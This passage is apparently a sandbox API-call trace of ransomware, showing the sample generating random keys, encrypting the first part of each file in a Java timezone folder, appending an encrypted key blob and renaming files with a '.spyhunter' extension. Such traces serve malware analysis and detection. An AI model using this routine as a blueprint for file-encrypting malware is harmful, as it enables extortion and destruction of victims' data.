hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.951] GetProcessHeap () returned 0x2c0000 [0168.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0168.951] GetProcessHeap () returned 0x2c0000 [0168.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e05078 | out: hHeap=0x2c0000) returned 1 [0168.951] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce518 | out: pbBuffer=0x25ce518) returned 1 [0168.951] GetProcessHeap () returned 0x2c0000 [0168.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0168.951] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce510*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce510*=0x30) returned 1 [0168.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\South_Georgia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\south_georgia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.046] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\South_Georgia") returned 66 [0169.046] StrStrW (lpFirst="South_Georgia", lpSrch=".txt") returned 0x0 [0169.046] GetProcessHeap () returned 0x2c0000 [0169.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.046] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4d4*=0x1b, lpOverlapped=0x0) returned 1 [0169.046] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.046] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4d4*=0x1b, lpOverlapped=0x0) returned 1 [0169.047] GetProcessHeap () returned 0x2c0000 [0169.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.047] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.047] WriteFile (in: hFile=0x178, lpBuffer=0x25ce514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4d4, lpOverlapped=0x0 | out: lpBuffer=0x25ce514*, lpNumberOfBytesWritten=0x25ce4d4*=0x4, lpOverlapped=0x0) returned 1 [0169.047] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4d4*=0x30, lpOverlapped=0x0) returned 1 [0169.047] CloseHandle (hObject=0x178) returned 1 [0169.047] GetProcessHeap () returned 0x2c0000 [0169.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.047] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\South_Georgia.spyhunter") returned 76 [0169.047] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\South_Georgia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\south_georgia"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\South_Georgia.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\south_georgia.spyhunter")) returned 1 [0169.048] GetProcessHeap () returned 0x2c0000 [0169.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.048] GetProcessHeap () returned 0x2c0000 [0169.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.048] GetProcessHeap () returned 0x2c0000 [0169.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04fa8 | out: hHeap=0x2c0000) returned 1 [0169.048] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce510 | out: pbBuffer=0x25ce510) returned 1 [0169.048] GetProcessHeap () returned 0x2c0000 [0169.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.049] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce508*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce508*=0x30) returned 1 [0169.049] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Cape_Verde" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\cape_verde"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.049] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Cape_Verde") returned 63 [0169.049] StrStrW (lpFirst="Cape_Verde", lpSrch=".txt") returned 0x0 [0169.049] GetProcessHeap () returned 0x2c0000 [0169.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.049] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4cc*=0x61, lpOverlapped=0x0) returned 1 [0169.050] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.050] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x25ce4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4cc*=0x61, lpOverlapped=0x0) returned 1 [0169.050] GetProcessHeap () returned 0x2c0000 [0169.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.050] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.050] WriteFile (in: hFile=0x178, lpBuffer=0x25ce50c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4cc, lpOverlapped=0x0 | out: lpBuffer=0x25ce50c*, lpNumberOfBytesWritten=0x25ce4cc*=0x4, lpOverlapped=0x0) returned 1 [0169.051] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4cc*=0x30, lpOverlapped=0x0) returned 1 [0169.051] CloseHandle (hObject=0x178) returned 1 [0169.051] GetProcessHeap () returned 0x2c0000 [0169.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.051] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Cape_Verde.spyhunter") returned 73 [0169.051] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Cape_Verde" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\cape_verde"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Cape_Verde.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\cape_verde.spyhunter")) returned 1 [0169.052] GetProcessHeap () returned 0x2c0000 [0169.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.052] GetProcessHeap () returned 0x2c0000 [0169.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.052] GetProcessHeap () returned 0x2c0000 [0169.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba5c0 | out: hHeap=0x2c0000) returned 1 [0169.052] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce510 | out: pbBuffer=0x25ce510) returned 1 [0169.052] GetProcessHeap () returned 0x2c0000 [0169.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.052] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce508*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce508*=0x30) returned 1 [0169.052] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Canary" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\canary"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.053] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Canary") returned 59 [0169.053] StrStrW (lpFirst="Canary", lpSrch=".txt") returned 0x0 [0169.053] GetProcessHeap () returned 0x2c0000 [0169.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.053] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4cc*=0x414, lpOverlapped=0x0) returned 1 [0169.072] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.072] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x25ce4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4cc*=0x414, lpOverlapped=0x0) returned 1 [0169.072] GetProcessHeap () returned 0x2c0000 [0169.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.072] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.072] WriteFile (in: hFile=0x178, lpBuffer=0x25ce50c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4cc, lpOverlapped=0x0 | out: lpBuffer=0x25ce50c*, lpNumberOfBytesWritten=0x25ce4cc*=0x4, lpOverlapped=0x0) returned 1 [0169.073] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4cc*=0x30, lpOverlapped=0x0) returned 1 [0169.073] CloseHandle (hObject=0x178) returned 1 [0169.073] GetProcessHeap () returned 0x2c0000 [0169.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.073] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Canary.spyhunter") returned 69 [0169.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Canary" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\canary"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Canary.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\canary.spyhunter")) returned 1 [0169.073] GetProcessHeap () returned 0x2c0000 [0169.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.074] GetProcessHeap () returned 0x2c0000 [0169.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.074] GetProcessHeap () returned 0x2c0000 [0169.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebda00 | out: hHeap=0x2c0000) returned 1 [0169.074] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce508 | out: pbBuffer=0x25ce508) returned 1 [0169.074] GetProcessHeap () returned 0x2c0000 [0169.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.074] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce500*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce500*=0x30) returned 1 [0169.074] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Azores" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\azores"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.074] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Azores") returned 59 [0169.074] StrStrW (lpFirst="Azores", lpSrch=".txt") returned 0x0 [0169.074] GetProcessHeap () returned 0x2c0000 [0169.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.074] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce4c4*=0x74c, lpOverlapped=0x0) returned 1 [0169.087] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff8b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.087] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x74c, lpNumberOfBytesWritten=0x25ce4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce4c4*=0x74c, lpOverlapped=0x0) returned 1 [0169.087] GetProcessHeap () returned 0x2c0000 [0169.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.087] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.087] WriteFile (in: hFile=0x178, lpBuffer=0x25ce504*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4c4, lpOverlapped=0x0 | out: lpBuffer=0x25ce504*, lpNumberOfBytesWritten=0x25ce4c4*=0x4, lpOverlapped=0x0) returned 1 [0169.087] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4c4*=0x30, lpOverlapped=0x0) returned 1 [0169.087] CloseHandle (hObject=0x178) returned 1 [0169.087] GetProcessHeap () returned 0x2c0000 [0169.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.088] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Azores.spyhunter") returned 69 [0169.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Azores" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\azores"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Azores.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\azores.spyhunter")) returned 1 [0169.088] GetProcessHeap () returned 0x2c0000 [0169.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.088] GetProcessHeap () returned 0x2c0000 [0169.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.088] GetProcessHeap () returned 0x2c0000 [0169.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd7c0 | out: hHeap=0x2c0000) returned 1 [0169.088] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce508 | out: pbBuffer=0x25ce508) returned 1 [0169.089] GetProcessHeap () returned 0x2c0000 [0169.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.089] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce500*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce500*=0x30) returned 1 [0169.089] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Thimphu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\thimphu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.210] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Thimphu") returned 56 [0169.210] StrStrW (lpFirst="Thimphu", lpSrch=".txt") returned 0x0 [0169.210] GetProcessHeap () returned 0x2c0000 [0169.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.210] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce4c4*=0x4d, lpOverlapped=0x0) returned 1 [0169.211] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.211] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x25ce4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce4c4*=0x4d, lpOverlapped=0x0) returned 1 [0169.211] GetProcessHeap () returned 0x2c0000 [0169.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.211] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.212] WriteFile (in: hFile=0x178, lpBuffer=0x25ce504*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4c4, lpOverlapped=0x0 | out: lpBuffer=0x25ce504*, lpNumberOfBytesWritten=0x25ce4c4*=0x4, lpOverlapped=0x0) returned 1 [0169.212] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4c4*=0x30, lpOverlapped=0x0) returned 1 [0169.212] CloseHandle (hObject=0x178) returned 1 [0169.212] GetProcessHeap () returned 0x2c0000 [0169.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.212] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Thimphu.spyhunter") returned 66 [0169.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Thimphu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\thimphu"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Thimphu.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\thimphu.spyhunter")) returned 1 [0169.213] GetProcessHeap () returned 0x2c0000 [0169.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.213] GetProcessHeap () returned 0x2c0000 [0169.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.213] GetProcessHeap () returned 0x2c0000 [0169.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd640 | out: hHeap=0x2c0000) returned 1 [0169.213] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce500 | out: pbBuffer=0x25ce500) returned 1 [0169.213] GetProcessHeap () returned 0x2c0000 [0169.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.213] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4f8*=0x30) returned 1 [0169.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh88" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh88"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.214] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh88") returned 57 [0169.214] StrStrW (lpFirst="Riyadh88", lpSrch=".txt") returned 0x0 [0169.214] GetProcessHeap () returned 0x2c0000 [0169.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.214] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce4bc*=0x127d, lpOverlapped=0x0) returned 1 [0169.262] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffed83, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.262] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x127d, lpNumberOfBytesWritten=0x25ce4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce4bc*=0x127d, lpOverlapped=0x0) returned 1 [0169.262] GetProcessHeap () returned 0x2c0000 [0169.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.262] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.262] WriteFile (in: hFile=0x178, lpBuffer=0x25ce4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce4bc, lpOverlapped=0x0 | out: lpBuffer=0x25ce4fc*, lpNumberOfBytesWritten=0x25ce4bc*=0x4, lpOverlapped=0x0) returned 1 [0169.262] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce4bc*=0x30, lpOverlapped=0x0) returned 1 [0169.263] CloseHandle (hObject=0x178) returned 1 [0169.293] GetProcessHeap () returned 0x2c0000 [0169.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.293] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh88.spyhunter") returned 67 [0169.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh88" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh88"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh88.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh88.spyhunter")) returned 1 [0169.294] GetProcessHeap () returned 0x2c0000 [0169.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.294] GetProcessHeap () returned 0x2c0000 [0169.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0169.294] GetProcessHeap () returned 0x2c0000 [0169.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd040 | out: hHeap=0x2c0000) returned 1 [0169.294] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce500 | out: pbBuffer=0x25ce500) returned 1 [0169.294] GetProcessHeap () returned 0x2c0000 [0169.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0169.295] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce4f8*=0x30) returned 1 [0169.295] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.440] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh") returned 55 [0169.440] StrStrW (lpFirst="Riyadh", lpSrch=".txt") returned 0x0 [0169.440] GetProcessHeap () returned 0x2c0000 [0169.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.440] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, 